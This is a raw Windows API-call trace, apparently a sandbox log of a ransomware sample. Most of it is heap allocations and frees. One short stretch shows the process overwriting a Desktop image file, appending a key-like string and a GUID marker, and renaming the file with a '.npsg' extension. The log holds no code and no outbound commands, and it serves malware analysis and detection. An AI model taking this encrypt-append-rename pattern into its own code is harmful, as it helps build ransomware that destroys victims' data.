[0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.437] GetCurrentThreadId () returned 0x5b4 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82288 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.438] GetCurrentThreadId () returned 0x5b4 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400668 [0237.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400608 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400620 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400680 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400698 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400638 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400608 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409170 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.442] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x18d7f, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x18d7f, lpOverlapped=0x0) returned 1 [0237.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0237.443] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18d84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.443] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.443] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.444] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.444] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.444] CloseHandle (hObject=0x644) returned 1 [0237.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b83cd0 [0237.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.448] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\p-DM0J8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\p-dm0j8.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\p-DM0J8.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\p-dm0j8.bmp.npsg")) returned 1 [0237.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.450] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.451] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ff4680, ftCreationTime.dwHighDateTime=0x1d5c4b6, ftLastAccessTime.dwLowDateTime=0x1289cdc0, ftLastAccessTime.dwHighDateTime=0x1d5bcd3, ftLastWriteTime.dwLowDateTime=0x1289cdc0, ftLastWriteTime.dwHighDateTime=0x1d5bcd3, nFileSizeHigh=0x0, nFileSizeLow=0x18d84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p-DM0J8.bmp", cAlternateFileName="")) returned 0 [0237.451] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.451] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.452] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 